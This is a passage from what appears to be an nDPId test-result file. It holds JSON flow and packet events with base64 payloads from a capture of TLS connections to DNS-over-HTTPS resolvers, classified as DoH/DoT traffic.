DFV3G2Mz1lBTIG8+EI15TAfiX3THktTEDNdXWRIKZWc6CdSZSTQj5epKSMIDeZ3ym23Y5D0uYv2rRWwF77WpaBXG+MUxbpeWleGLZxmojsUrhsTN3K\/SO4YTnIH3mEDcbuEL\/C6kXZUUc3JKUkSmGmNO61dgMehbma4fB8llee+ia3ZxrMWwvGiTS2tpm78Rjdk2lVGQ4Kw0Hv16lr+xG8BLc4CMV63wU9gsM8SvlR14rXUIcZ1w1IVKRMCPj5\/ktzqCSdsd7JLAu6iqnF+tffAp0R7hABno4kl79WtkvKmhCxs2C9rHaxhWuglRBec9Q1dOU4n\/q5s3oTaT0MWOiB9FA9hPVkcr5rHO5WTaUTZCO3f07agWWupUC0SrT4kMq2F7GC\/qyJUokz54psYmDyksoYU5W4XunHAPWif32UI8qTU8ZnD9BGfH74hn454rDYVO6L7CccMxZlmp851erV6hvxeQE4QFic5+4T+9IQsqcHez2OFejw6vdevdAwPVqE+KjL4UP+MGf4lbUn4WzekrRNg4+OLWhqMW5jPxgVFLL1X\/7LXlyiUW3FZsQlx3wHUnrfnXgRsgIdVSezz4HY0222o0JjMjRIsMAML27omWMbFkL1GH9F5whlSmkQo7tR4pkO8ZObYU6gN63eRur2pr9yUb6mdaHxKm
oMOtTc07t4c0mmYRPcKvUuGEq\/qFZAib\/Cn9qtJSED+KsOJFP3lcOvHyBWmDkPTuXhIirjxvNRHlhpCinnvq51BRLv0iIYtLa4+FWzOnZxdtRmb+J7gXcYqMUZr8f9hSbjcXpRs0qTCNkn\/vEFebnj0Oa5wWQ\/wyYqcIXbH0+Qg2t4MHCtt5puUCcnWiddPmXVCEbusxDhj1mW7Wb7s7TbeMJNHqJK2wkpexuwL1VqKOcMpKkVK63qTpeBRS7pKr42\/e4RAue3aCNMwXb2qN+nhV\/yAs+no2\/T8CA38S+A3XjJrTp3nRj3b7uYGTvq6vgcySIveyFsNVxbpOrMNJwA55r7OmJm\/TMMYu1Cmm7ApgsYESAyvVbBcTmlsCXf4kc5\/PCSNGVGXc3ry7HZ6UrNLiBxVinlqk+M5YS+nDMxRpBRZ\/l5jocQH\/hTpYeDeBYM6nlOI3a42ojQOf0qu\/s3tJK0pVMQq+L3fiObQL0w0ki8zB\/Pq94eJzcgGDCpDBI5rSkrXqKSKwE\/TPxGGb4EW3iPF5GMaLLk69BANjmbdOWrRbmSOZIerFLKML4S4ISArr9z\/Hd6jn9grfPQF5QPRgsy72snzNYK+cdD78EVK3JLSsYYqn88MbAXaWnvt\/NrtPJL0QXd+HGti75Czr60Z2exrtdLfvuyhP6EA\/OJF74UO1DMZkdkO4dBy70z4Gu4gpkQ7cqPDY0GZ19ZQkhDdIe6tY\/KPM4UldVfU5Ox+v3aicLwXXKsL1aYiIDMExLQqDr8Vp6Rg8MhQd15RVUWWezyYpN93w5RckR2WthYnNZNsPa7iVvEbmCiUoUkbzt39o4APEG2T8nb60w4QPGzL8Bs+6zqpdT6PPZQOoSFcrit36uSRZP8iGT1fW72Vs+Zxy5GcZuta5oSW5oky8Ru7NnhXKgfldlxRBIOjtCyzFizIawHPWtdb1FNijZyZVKdj4BP0ocR0b5RYPeWT1DhR9qwqhFmLRHqWhBkA5vK7BpYSEPmeNp9JvF8mc9PzqPXFx4qv46sa0RB9Om1TkSniqOmaKfC0VJ55FKEd3mCSVa1mQ2nzlNyLUC\/G6NFqNfA87dMc8kmjkPDW9L4TPuUdk6cFk2SWFMlOT4UEAqyKhiuK9S2TSwt8uFOPCTdi2gCXoEJdX+9z6vM3zP1D618aG60X5Ut6n4\/mqqX3ZYS740az2d1czqYB7kjzMa99L4RSKw9Nv7MMuwMNSxkhAXISg5MWpacHw\/KAdEQ1nUyITpRoICmtn4wFkGI6VHWSC4OZg5gMWs1Z3587N6CIw3eN5rLnfYJ5l6ZBNqLnr+ciVip8x2IDHWDGTGr5OC+uJxAOEMiK+fcS0il3LgKzbRTF6C8+Y0IWjT3NlBZzIZBcCE3FjrijIv+69vNs6VJAKOlSW3f43x0FPmVvFyGHd0hZ6go7pV\/2O1uABkUwtp9Jfvr8prX7E0NzIH8AuTCtktrwjOAvCJu4CHVfpkaygbTIxPH5m45oyD64MuKPbsc5SlgZwhfZunmTwVDMaVpXGfayrmusZgZ\/07zHxvKOvoAfTCZXoYameOeAqJlNLuCW2W26TogT5fb\/9WF1j5kVLVJW3+Xr3WsDu87Z6wA7xpdVjSQWvWXCJ9y6jEXbNwmvXmeHALYBp+DdvlGU6uIsmqv2tJETpbTRkgR+f7Dhm8aD8084eT\/a67jbRGqTJcyCWp8HFxcSFdtdPKZoErFiYrC7xPgwqW36MeKC3pPi5nT9yuHbuL7yiKV4x9J1dDJBmuStOS8bPFHHOamsDufj+1xHeCKIDfJN+meXy0zdvw70PEKqqZXmCwfi2TfqRVP7d77vAzcphP1F9+RnUlovNNUieiBKgaaaLwfIEAiD84YhuItQrVIeJCa0jqOgMbgEKi1twm5DKS0bcizlDtDFNkFvRAghS6l8H5MMzc8ps2oVnq34RHWoVdxAXCkHDkkmpkGwGKoEP+YE
VOArEfXlh0taA60GiWgLXrspKhJVAnjFiuxV1QiMjD4R5UbJ+BnJTGXsaH\/yPppjwU5bzpYvq1TPW2pdHuooLQ3rQ5gXMFPVeJEv4l3u9D\/o1MxYmTHF6ag0Pg7EYa9IiJh8NJsAWlNoM+jz3\/neEdRD31BwTKccVefTs8giAaZY3hKJ1XXe6Hys7XZMAJR72EIr5DA0qa2euR8ERpA8eew\/h0vqG8NScpvxxA8Cdjmhn\/JwaSSF9ubglNVw4f\/Z3JUgBYq3\/\/+9aFTg5SP56AY5voL2goU8TTHIbBp4JfOUmUTToGPy4GEqVcJNDAs6V2L7PobZ6srGT2l40lZacD46Db+MrlADUrWNBC6GAGEaOIzjsVXO2C7zOXrZPBi"} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311566,"flow_last_seen":946739311603,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739311603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02347{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":946739311604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739311604,"pkt":"ZmZmZmZmRERERERECABFAAWWg4FAADQGf2a5hsQ3CgAAAQG72BqMAvZEFNMFiFAYAfXAzwAArcpCfmGLOKjDkyzsTe+IPkiqYnruzR41MPuGsz88MQqvC3a9HfwXJ6lzqQ4rCWJcWhWOM\/faQczL\/u4LUA47B+3hgIraXqwM7U0QtAPKeofLhsqBn12DazruSHbiIbxy+mEUG3S56+4ZRbB44U5cKRW56AecOVegPdxq19WX7WP4+ZvrOsXSvkcqGqyY6l57+wMNGtK9Hor0ODYeWdBnCWx+J55Yp1BLeNHq9nHIKHj0qCJNcTpuSY3kcxYIKgCzUqmtnXdoJ0GIMlbY2ljKsarNr5cWoMUbBujc0flI7F15VAzRku1eV3Kl\/7Wukzg8w4HiH6xnnC2hyeJ\/S9kg8k3Thktb0MRLph1xkAte3QZc08opc3Fwo1Ft6aRVOUnBzMc2ygQi4cXDCHwkiaI53r8gMzkS7anbEcS4yQcROtN4r2sH3n\/Y2Qw1v5Gb+U\/+RFg8+P9ZzSoFBkttBuC7bMKkuFovtwfD7bmTraXz2TwXRpY3Ao54+\/SNvuV3GwVsY67MLueBEgpQWATGxrbkACZtD4C+lpPBC5\/54MNyZi6y2\/bINiwBN2SHIdC0sG5gR\/DV19ykdqXF3pfYHlmfR3703pqTCdiZz1zhoMZLCPXVwnRt08WzrSf9AJPIVrVED87vfcSxcnSNe9\/uUQ+fPjNxmvMBL8ur1shycxG8A4cFPyuqBeBuBrfVjZFKQN3\/5iT\/qY3bW5kYmBDrHkL2xegzf\/Moa8towjQGmRBeDyc9Fogbi4Bl2lSDI\/x3VZI\/8yRCU0YCrn33V5Yytpt4Nri5jL3CrvqNUKuK49C6RMwZ1n1NkjUcpjeYGCGRXo6SbIn8CHVjiCEwFZ8FbQctAnWvdqfTpT0bXGelftgC9CQThu\/W+ybRqQdwN+K5c2QiXPYvO4kT3LD6oCwacJ4x3t9XRv3AXxYa1UbtXwad0Q5XC17E9XVpbbgKhrlco595yY5V6j1HdG8AkTRI1DXbEp3foy5yEjtW0o9bfHyhwUqC6TBXcyz4z4cHmh5p6A6BMpnvPJtMyGOVMKQ7LtCwwAKXNWcMVkLjSAZ+IrhMtGXoEFJcdmyQxTOI+OfCfdgm6q9yTer0lySMXu3yBMcL6Vn1SuMzS2FSE1aXKAyCBb3XF5Tfnf2rLe4r3hkWTr8Mmu\/+5cpIK1r4NWR0zq6iT\/lnsbxmS39yt3YHMSpG1r36HYatyCzF6kZo6KyW2UJ6fBqDVBmGD6CXSVAKejLC8pL1qmuOu2eXU804WhkOIkczZMz7pQW6C0A+bVJsEuL5Kd7KV\/W2IGcqNMtuMkFf1vHE4VTHRAmWpIDFt5I4ja4qA9N7tAzSWPkgtQseSnNvTrX+nCc0rsjLviAcYafijP+ATzRDOBcDAwEZYz205aORxNiMwaiQeObwk59GyoJ+T+YW4iSATpt8cc0OU+XkwulympL8b+KCt76fJXCt3rgEOglVp2lJQDaaCL0\/EDry33zbH0MtKm5P5nEWpzvQFhaXV1WeS3oS65S\/3UVJ
T7\/Hm\/AkB6N0iCgWEeK4i80RHGCYRIweyu9kQIUklvy2RlmccKeVQTq37O+\/HqRcQLsrpTkATqOJMvj0MaZ7zkYReeTUbtUUtzasEHVGtHimiktW2DAjF2G7BrMbQnAbkBNJMIcDNYwAwDUJvD2+j752nnR\/ojUHAoRsnlpRRGw8k7CJ0b0wBSknElPWssxoC\/r5K7w37x9u118AdMWjqtzSlF2uDe2PtsgCUxjOE7EkCZxpOWsXAwMARUyGMct3ItX2QiSoGAs2qAHwCi9mgPaAr45Z5ZYVR5NUAg5k1dXUDUazzqq9GbzXT1\/7OFi8y8eMdJWfTGFw9qor9xL6ew=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946739311703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739311703,"pkt":"REREREREZmZmZmZmCABFAAFIvxBAAL0GjQMKAAABMw980MyiAbu+o\/fohj5JlVAYAfZx1gAAFgMBARsBAAEXAwOEmak1ToTEOPVX0jBh7rLNZM1Gt5\/Gr6ZvrmdHklieHSAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zbmwuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIGzt4\/5xvtyifU6VTcrfvT+YrIEhagkzRKKKlOYdvDd6"} 
-00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311703,"flow_last_seen":946739311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739311703,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946739311732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311732,"pkt":"ZmZmZmZmRERERERECABFAAuAX8dAADUGahUzD3zQCgAAAQG7zKKGPkmVvqP5CFAQAIN8DgAAFgMDAHoCAAB2AwNcTBj+nowDUUbglTTLuZi3m0Fgte272n9LPifxOMv7HCAP2LkoS3kAHcBOg6onjDU7HEdrdZ3cuMs9iD3w5kCD4BMBAAAuADMAJAAdACCPdFwMNjRtfUXHati0iPvUS7ZISUYNc1KeHBUbO8YTWwArAAIDBBQDAwABARcDAwte+JJAD4P7EW1qK\/KMQB2haaLigWKb\/DYNFwlVC4RO51bq0M8eao6QlrOrDJOFceHVJKhl1p8Ibfrg\/vTRNCJB\/UcW+Fedt+hD1iuUDwTCFZavOS7xwPDkL6497l\/MLuLG4DXgnGeZQ+ANIJd3qmkp82hmnma4vPPfih3FXm2d\/orPnXJKqjQROYWvMcbtvj9Ebb\/txBSHxVMCrKgG408ySWMQj9wSJ3YFhq0yzQL4\/vZaLuRC+Soen8TCR9PMAvnOESL67SWkKNvrhHs7A8wve1+FS4QJZG0DVnfyZjC1lTDakOFEVj8uyQCDIeUSTCCRymHyRKKDInznJ9K1ylbbeIGdenKpQOC\/PvdDSl7uxqaByB3NSIma+imeWtGfSsSVz2bgzfRCO+1shU4LOWr+fJj4VfVm44ziFmXpQXba4
f4sLTdWNOjDqe5hsphKeTPq6cjwHY\/8d4YQO1mASNyJu5PHaom1vL8or5mJSUE6nK9PPUFEoI+arXXrdILbrGh6AFzUXQGBrrAdekMh3lpPbuWJTMnyJ+tNhczzi4OaeErbR+eZBtyO483ig0A5ofFGX3QqSY+x\/jYa34H7RpPgi7E73Kv3qvag06VhkcjqWXPokFDtuDpOCx1sHam7i\/mBXaEeSIMn\/6ibfBibK8Ssyhd351G+u7nIG\/kPMrFG9dX2lYQXotCoRmApyZWnnIvnb1Ems9MFs1nWg90WJfHxHinrSdpjBeU8iAbpS\/jrwrYxGk3gVDAv9VGAkZlRz60RiJgOn74olT+JGbdB87Dmd8zXzGHRAs6xX1wLyFHdLBSPxN+wXikNtBamIrek5su\/OhIPfJ9Db8D4NRmo2RQxqPr7fuFEkduV14PFpTKUsiEOkhDJwNg8LiATZ7RVwMg6yMpsydYcgvfMea751TpJNvE95FINDC3Rb\/\/f0HmE4sSUBcBPMBavqAtQ7YhyYupjzYKChAX9lCvR4V0MA3gDeswYrL6CJ2QWYyZ1X5kp+MoOy0A6lbwTY6FAqgtyYhKr1esD7uta6z13oZTeC8zVTDF3SZq3we2RpHyfhsBTKY94xuStpqoHpzXuf67EN9Ci9BXk7ctHV6chPXxbzfNbfHejhQSWblCUVsEWcGJTaWPfYy8Qk91uEWvknUwg3\/gnkTaxOpg74KZR+eQhsLtgXu83uRIpmos4uiAQqNFCr46gFv66IhjUaLn++05xvOtQF+pJff5ceYA3+HVtzS7siCW14iQ0F2g+nmUdK\/l5e2iBJ9jUDVjX1gbsI6q3sWAVlaZSWaqGUPI7tEUJQO+uLheM+t5WJ2hIuHlBrb7V9x7oPe\/w4Jyh22GAaILXTviEQ++5bF7t0H5J22\/uU82cBtUmtPnPK980jnCJpoWHcd5b8NrM+3vBCp31WdecAix\/bw5hrhpdYb3Wuo00LpEwMw5n1XbAIEscw8D\/TDkT3R8DdqFFvsOwEJgVupjA7F1prq8T49hiTkdYl+giz2p0Ayt4KR\/SKb+oWG3y4ZtrykubZr+Qfc18G7yRy1UzXXJ7wFTK5WhTLREjxeCpH6IaQ2zDQ5+I3brP682k2XRTd3nMiVhZaMNZjB3MO3yAICh5zK9ucc+onrCYJIYI\/CtjBj1mJ\/oiWvsTssUIxMNevGNJc8s34PU+GVpiWU7G1gOq2\/oHbQNmNjM6utdbIKFu2BrwDIIIyRNAnfbb8mkTirEZY8JOBVWtUMwNF2wWG\/znmaTdvsV5XVYinNGBvCLJ4cl4jpIhiQHJif7TdKLHCM1mnqE7oXlP0MjNOI8YrXpYFJApJqV+nQMhEAl320hWRRZS9jvtYuADMZM\/zqsrhOwTRUYvn5TUWPPSLkDCWWQT\/boP1Zrm7ipJ29gjQr5TspKmpn4J6SGBQtqSqLcPrjFY1FGqzT0Cxa7I4qGdQmb7BlBoZsZba4XtkUxqQDb7GQ7lF9QZ8stU169sKy3x8YQd1brzqNHrkIJDSvbZZhCJGpijHPtgp\/QG6Dw2\/BImDmY1tBmkVrEm\/bZ+xumAD64t1fYO7WaWjuGbU0Y+9l0+9zDoVeHa476WXFF01qNlSxZZAxFkrGmva65Ha2zNip3N87qP3nyH+3kbjqzMKrpNdw3pOcpWv+PdRxpJZGkBM4aT6LXbJdAxBLLkkepjX3bVMWm9bedod1MvUUZQHAIRVofMSy8iwjG593htNanCQUBVZUhdnlVrmQD4OR5EjaE0aFJSUsVHU2VO9DX1cb2EnPoiZIzX378PPrzLoeda6yE90ZvWYSJeMUQJgjFljjq1Vmv7zPz+m4Us7Q\/oFgLEuTkw4eq\/OB+aA8STNn4AHoTw1B57\/koj\/Tsd4yxadruMqmxj8G0neUx2FN2AmiTBa4RjoLGNzELD8QTXTHG2\/lxfzCV
wHvLq9JxQf3uprD59F8Loph7ycBJ+j\/BoYH+iVGt+6GzZ563iyu9UeY0+AiljVO0GFvxbuhFk79OBcmYfgnlTvugErVv1eoGzzwF3KK3N67S4ysk\/cJIT\/DoRZvga\/lMRKstxDLEaDolPIBoEiu4mAsdPBxa5KjB\/uaPK\/Gvldfb7QWo\/hvHLZAM3qCGVxLZ4OSPZzTuJ4fJWIQaOXTrFJVv4TYo67KpO9uvbnZUtP8hCVop9O2qXs\/NKl69+XIEhMfw1KYOxJAcgDxH4xjWm9TWAA+DhZvFs31qLGWSu3CzrM+geUCeE\/Vlrc8pmCZFikrptNtJl0uwOfLeuZUF7VWjDr6R5HxdwbmReRnk8DeQUb8\/JzwIyCR78O7TDjY2uL4IEBoTWwTpLR+tDFV4fNsyzL4VzpHaIwnMWTyomGHXhNDLAvBXN5lZAH1nY9D82KvJ+P8HK2FgOErfXrK6gPfonD48R1bCJofrjuMQkEZVQBGqn5ypZTPRu6EwnkBn4q0ARPtqm0QEoQ1VuhulmyIu4zwbE+pgZlGBWhO+4WIy2SuF0h7yFf\/0cbwCehkDSsGDVM9QRwmW02sBUez1\/0Ml7N8nkc2bCsJgo\/fEUXj1TOn7cIchmlzf+MvAjyYfcGhECzHaENxMQIFKZWAib9UAuoVCbRMTYEaO8+NZKwO6bZTHvUzm+gaaUre7sgcCCP\/wfz0OXBRWwpNRR4m\/LwYXSYWMMhKP7tqCCj6OXjzq62VPsWFinT4KE+SZYXF5y6EZay9KdRh4kW7ybiZ7hqI6uqO0\/mKAHQ\/xlXAuQ2EOnYG47KeZUkoht4zFh4Q7AcG7Q0FtDwRhJqM+GVySAg9IbIymkvgNTTZyOY3isJHVYzmKvFAgPib7ERkwsvRQ\/S8lGEoG+lZogb0KK4PyuRpdocXBa4Io1guVhX2K44\/qHOYqiQPL\/Vb5wtdOiDpag22zTziquJAPx3Cc98vOxAd33lx77fZMHNMz95phNb\/gH\/oBI60jIQ5icFLLZs+m7nP7\/6KXDZlQEY8H6HyN8CbMnqheODed7gRjDQsbXi9MHr27blhbJLCz\/qn8J0uletyL+6GpmTu9W1AZiLdNt26PN\/1uozWEq9dfJLpT7KZnW6S0qvTBGlR4kX8O3fku9pK2qyz9s7t7Ockp7sMMWorJbLnKYK0PgDcQi4HUA+VDHi2RlLA\/XZ9u3fGBeP6zmmrFeEhRc6glZV1JpHMW35YHtgDMlMPiXVu6VYVSboWqwuvKzMobkKuX8tZFxZtF8Qlpv25zGgKwz"} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311703,"flow_last_seen":946739311732,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739311732,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":52386,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"dnsnl.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":946739311734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739311734,"pkt":"ZmZmZmZmRERERERECABFAAC4X8lAADUGdNszD3zQCgAAAQG7zKKGPlTtvqP5CFAYAIMEyQAAeS0tOv0CsE56CKvTlOFyTsi\/xDWjEiSHZ06cNkY05jGBZ0BY+\/8ar9VauCfvuAhmfbkHRsufSt9+BCdWOZTLG2pLv7Rqy1KMbXDj1dE3FFg5TtH6GqR+kavc+JEGFEgehaZ\/FbuVi\/sk8mhzGqOKXx4crPRKN7mN3k61duL6EtdmqASfaRcWFkjwmH\/5s907"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946739312203,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739312203,"pkt":"REREREREZmZmZmZmCABFAAFEaI9AAL0GaqQKAAABdMuz+KL4AbtonCHmRxNJVFAYAfbqtgAAFgMBARcBAAETAwNLJ0LoKZs0jG4db6SH737y8naHXDM3S+mAdGRoYzSPaSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOcnVtcGVsc2VwcC5vcmcABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg33Waic8Yfh0yJ5buIXWM7xt29S4VxDeDA2qvuzRytkE="} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312203,"flow_last_seen":946739312203,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739312203,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946739312226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6JAADYGLgJ0y7P4CgAAAQG7ovhHE0lUaJwjAlAQAfWSIAAAFgMDAHoCAAB2AwPlxRfYXMEhZdQ8ajfb6CRVs1xCMiaZqVFxrCKnBSpfMSD3zYs+eWXICfX4e3zLCPsIhyJf4YitXdBLrNgVR3LKFxMBAAAuACsAAgMEADMAJAAdACC7U5tcN1lyGmU4zwJoCO50vCXYPM\/QvTMxioFdnZMwahQDAwABARcDAwAgWYRxXowUwkrzaVinqnzWcQ+TBbMUOwCXts50ql211fAXAwMLXdNQugGPXsJ\/8C6qtHlVybUGs7I40LMTA5OhGA+5YDHeNrEuEhv+tu5lin4eHBImQq4kbeHEAo3aNZo3KmURuDQDW8qwTnUEVfBOev0Cp\/PjSdjbD78ol0y5nY2oRm2fbsKHJzJSSjb0AciAo1LrQOgCF2CvMV+eyOyHUYct\/0CZzYMkLxKZwgRjyAJuXMfA4yEKZGM2df01\/BUbSo1Rl+1vGFFUkgKmIgKkRy+Bl\/5\/aUS0H7x+NZdUl10aLbTaEzyxHvC5FKjKyKio8Nq1FnOONx6t6a1NxwFwus79kTDzOhi2RBBAptjB5bREXvI7I78ofmPnYWckOqrJFFwvKuiJMXscIR8meUqP2LfgWzMDMhsH4p0jN+l3Gq+FBdoxKNoG26O484i0pfOfynG5VCfFmeEmq9XB2jrTV2FwEB1w6FHC1GMZVEK60qV4O+pPgrZRJMZSzwllOfjef8V42EZAcff6ioa4KXyU2Lg36HO0yhYzbeNUU3pAi5\/qwo\/8uuPNfVbKx0eipCjwx5+0hZa74DG\/pD0GzntSqS7YWEdlhEup1mtZmQo0eaDjwGNrCt+ZhJgQy3V2hPBCa6ygW9VMF25ycsILPfVx1AuqPxUOHW4j094S0MBQegEN0J3yWeWaiiBlzmaP9zyQI2IatrzAzhNsYChDHK+csfeO9ThoioAfgwS3AljMljsUX8LckrIXpurphG9MTttyGcbyuYOZgMBCh0hvfGempBEWQ87aRGnYict7DJMJ4ANT6I8mIRYfs9ktyEUtlVvr4PQNKARgob1jc7dcCzVhF1wheYyQGYeS88ndMehrocaatcfPAW+sGsd\/PlwCwZjCKZRZc+RY8UIBMVVQFkJfKmd3vMc6ZdNW+eECwipaKd\/GGSBQQLLSZMZlc2\/fq5kgX+ANS93WhwsRG1d13Nrw0y\/ATREqmO